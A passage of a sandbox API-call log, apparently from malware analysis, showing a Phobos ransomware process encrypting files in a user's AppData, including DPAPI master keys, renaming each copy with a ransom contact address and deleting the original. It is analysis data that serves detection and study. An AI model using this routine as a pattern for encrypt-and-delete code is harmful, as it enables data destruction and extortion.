"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.458] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.458] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.458] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x59a, lpOverlapped=0x0) returned 1 [0199.460] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5a0, dwBufLen=0x5a0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x5a0) returned 1 [0199.460] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x5a0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x5a0, lpOverlapped=0x0) returned 1 [0199.461] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0199.461] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.461] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.461] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.461] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.461] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.461] CloseHandle (hObject=0x15c) returned 1 [0199.461] CloseHandle (hObject=0x130) returned 1 [0199.461] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Global.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\global.lnk")) returned 1 [0199.462] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.463] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=1138) returned 1 [0199.463] CloseHandle (hObject=0x130) returned 1 [0199.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk")) returned 0x2020 [0199.463] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.463] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.463] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.463] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.464] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.464] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.464] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x472, lpOverlapped=0x0) returned 1 [0199.498] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x480, dwBufLen=0x480 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x480) returned 1 [0199.498] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x480, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x480, lpOverlapped=0x0) returned 1 [0199.499] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0199.499] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.499] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.499] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.499] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.499] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.499] CloseHandle (hObject=0x130) returned 1 [0199.499] CloseHandle (hObject=0x15c) returned 1 [0199.499] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\Templates.LNK" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\office\\recent\\templates.lnk")) returned 1 [0199.500] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.500] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.501] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=312) returned 1 [0199.501] CloseHandle (hObject=0x15c) returned 1 [0199.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist")) returned 0x2026 [0199.501] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.501] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.501] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.502] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.502] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.502] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.503] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.503] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x138, lpOverlapped=0x0) returned 1 [0199.504] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140, dwBufLen=0x140 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140) returned 1 [0199.504] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x140, lpOverlapped=0x0) returned 1 [0199.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ce8) returned 1 [0199.504] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.504] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.504] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0199.505] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.505] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.505] CloseHandle (hObject=0x15c) returned 1 [0199.505] CloseHandle (hObject=0x130) returned 1 [0199.505] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\CREDHIST" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\credhist")) returned 1 [0199.506] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.506] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.507] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0199.507] CloseHandle (hObject=0x130) returned 1 [0199.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9")) returned 0x2026 [0199.507] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.507] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.507] SetFilePointerEx (in: hFile=0x130, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.507] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.508] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.508] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.508] ReadFile (in: hFile=0x130, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x1d4, lpOverlapped=0x0) returned 1 [0199.512] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0, dwBufLen=0x1e0 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x1e0) returned 1 [0199.512] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x1e0, lpOverlapped=0x0) returned 1 [0199.513] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.513] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.513] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70, dwBufLen=0x70 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x70) returned 1 [0199.513] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.513] WriteFile (in: hFile=0x15c, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x122, lpOverlapped=0x0) returned 1 [0199.513] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.513] CloseHandle (hObject=0x130) returned 1 [0199.513] CloseHandle (hObject=0x15c) returned 1 [0199.513] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\be5b4fbd-cb99-45f5-9462-5f896dd3a6b9")) returned 1 [0199.515] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.515] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.515] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=24) returned 1 [0199.515] CloseHandle (hObject=0x15c) returned 1 [0199.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred")) returned 0x2026 [0199.516] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0199.516] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.516] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0199.516] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.517] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32b68) returned 1 [0199.517] CryptSetKeyParam (hKey=0xa32b68, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.517] ReadFile (in: hFile=0x15c, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x18, lpOverlapped=0x0) returned 1 [0199.520] CryptEncrypt (in: hKey=0xa32b68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20, dwBufLen=0x20 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x20) returned 1 [0199.520] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x20, lpOverlapped=0x0) returned 1 [0199.522] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa329e8) returned 1 [0199.522] CryptSetKeyParam (hKey=0xa329e8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0199.522] CryptEncrypt (in: hKey=0xa329e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40, dwBufLen=0x40 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x40) returned 1 [0199.522] CryptDestroyKey (hKey=0xa329e8) returned 1 [0199.522] WriteFile (in: hFile=0x130, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0xf2, lpOverlapped=0x0) returned 1 [0199.522] CryptDestroyKey (hKey=0xa32b68) returned 1 [0199.522] CloseHandle (hObject=0x15c) returned 1 [0199.522] CloseHandle (hObject=0x130) returned 1 [0199.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3111613574-2524581245-2586426736-500\\Preferred" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3111613574-2524581245-2586426736-500\\preferred")) returned 1 [0199.523] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0199.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x130 [0199.535] GetFileSizeEx (in: hFile=0x130, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=468) returned 1 [0199.535] CloseHandle (hObject=0x130) returned 1 [0199.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c")) returned 0x2026 [0199.535] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\protect\\s-1-5-21-3388679973-3930757225-3770151564-1000\\02540a10-7eb7-4b20-a8c7-470f8986389c.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0199.535] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 